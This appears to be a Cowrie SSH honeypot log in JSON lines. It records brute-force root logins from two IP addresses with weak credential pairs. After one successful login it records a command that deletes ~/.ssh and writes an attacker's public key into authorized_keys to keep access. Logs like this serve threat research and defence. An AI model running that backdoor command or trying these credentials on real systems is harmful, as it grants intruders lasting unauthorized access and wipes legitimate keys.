{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.716943Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.717877Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46802,"dst_ip":"1.2.3.4","dst_port":22,"session":"abfb35cd1cca","protocol":"ssh","message":"New connection: 212.227.235.229:46802 (1.2.3.4:22) [session: abfb35cd1cca]","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.783309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.786007Z","src_ip":"212.227.235.229","session":"abfb35cd1cca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.852535Z","src_ip":"212.227.235.229","session":"abfb35cd1cca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:15.120265Z","src_ip":"212.227.235.229","session":"abfb35cd1cca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49466,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7d6a434bf6d","protocol":"ssh","message":"New connection: 212.227.125.160:49466 (1.2.3.4:22) [session: d7d6a434bf6d]","sensor":"my-vps","timestamp":"2025-08-31T00:50:15.669312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:15.670022Z","src_ip":"212.227.125.160","session":"d7d6a434bf6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:50:15.744938Z","src_ip":"212.227.125.160","session":"d7d6a434bf6d"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:15.969775Z","src_ip":"212.227.125.160","session":"d7d6a434bf6d"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.026227Z","src_ip":"212.227.235.229","session":"d9986f72801f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.190535Z","src_ip":"212.227.235.229","session":"abfb35cd1cca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47476,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ed10837330","protocol":"ssh","message":"New connection: 212.227.235.229:47476 (1.2.3.4:22) [session: 04ed10837330]","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.256388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.258256Z","src_ip":"212.227.235.229","session":"04ed10837330"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.325892Z","src_ip":"212.227.235.229","session":"04ed10837330"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.633682Z","src_ip":"212.227.235.229","session":"04ed10837330"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.701255Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:16.702613Z","src_ip":"212.227.235.229","session":"04ed10837330"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:17.100451Z","src_ip":"212.227.125.160","session":"d7d6a434bf6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56896,"dst_ip":"1.2.3.4","dst_port":22,"session":"a48693a318e8","protocol":"ssh","message":"New connection: 212.227.125.160:56896 (1.2.3.4:22) [session: a48693a318e8]","sensor":"my-vps","timestamp":"2025-08-31T00:50:26.048084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:26.048989Z","src_ip":"212.227.125.160","session":"a48693a318e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:50:26.123874Z","src_ip":"212.227.125.160","session":"a48693a318e8"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:26.348959Z","src_ip":"212.227.125.160","session":"a48693a318e8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:27.510549Z","src_ip":"212.227.125.160","session":"a48693a318e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51508,"dst_ip":"1.2.3.4","dst_port":22,"session":"f011968b1b0a","protocol":"ssh","message":"New connection: 212.227.235.229:51508 (1.2.3.4:22) [session: f011968b1b0a]","sensor":"my-vps","timestamp":"2025-08-31T00:50:27.899425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:50:27.905884Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:50:28.138108Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.login.success","username":"root","password":"dell@2023","message":"login attempt [root/dell@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:50:29.079787Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55822,"dst_ip":"1.2.3.4","dst_port":22,"session":"18b3ac90616b","protocol":"ssh","message":"New connection: 212.227.125.160:55822 (1.2.3.4:22) [session: 18b3ac90616b]","sensor":"my-vps","timestamp":"2025-08-31T00:50:29.168179Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:50:30.022813Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.023513Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.024648Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.026082Z","src_ip":"212.227.125.160","session":"18b3ac90616b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.026706Z","src_ip":"212.227.125.160","session":"18b3ac90616b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.260141Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:50:30.754192Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.754902Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.991632Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:30.992475Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53042,"dst_ip":"1.2.3.4","dst_port":22,"session":"45cb4e60f937","protocol":"ssh","message":"New connection: 212.227.235.229:53042 (1.2.3.4:22) [session: 45cb4e60f937]","sensor":"my-vps","timestamp":"2025-08-31T00:50:31.217056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:50:31.218191Z","src_ip":"212.227.235.229","session":"45cb4e60f937"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:50:31.448410Z","src_ip":"212.227.235.229","session":"45cb4e60f937"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:32.381432Z","src_ip":"212.227.235.229","session":"45cb4e60f937"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"root123","message":"login attempt [daemon/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:32.602296Z","src_ip":"212.227.125.160","session":"18b3ac90616b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:33.618359Z","src_ip":"212.227.235.229","session":"45cb4e60f937"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54116,"dst_ip":"1.2.3.4","dst_port":22,"session":"9515a477afc6","protocol":"ssh","message":"New connection: 212.227.235.229:54116 (1.2.3.4:22) [session: 9515a477afc6]","sensor":"my-vps","timestamp":"2025-08-31T00:50:33.862696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:50:33.867770Z","src_ip":"212.227.235.229","session":"9515a477afc6"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:34.097216Z","src_ip":"212.227.125.160","session":"18b3ac90616b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:50:34.107101Z","src_ip":"212.227.235.229","session":"9515a477afc6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:50:35.066990Z","src_ip":"212.227.235.229","session":"9515a477afc6"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:35.310370Z","src_ip":"212.227.235.229","session":"f011968b1b0a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:35.314398Z","src_ip":"212.227.235.229","session":"9515a477afc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55338,"dst_ip":"1.2.3.4","dst_port":22,"session":"64471be0ddd7","protocol":"ssh","message":"New connection: 212.227.125.160:55338 (1.2.3.4:22) [session: 64471be0ddd7]","sensor":"my-vps","timestamp":"2025-08-31T00:50:36.438850Z"}
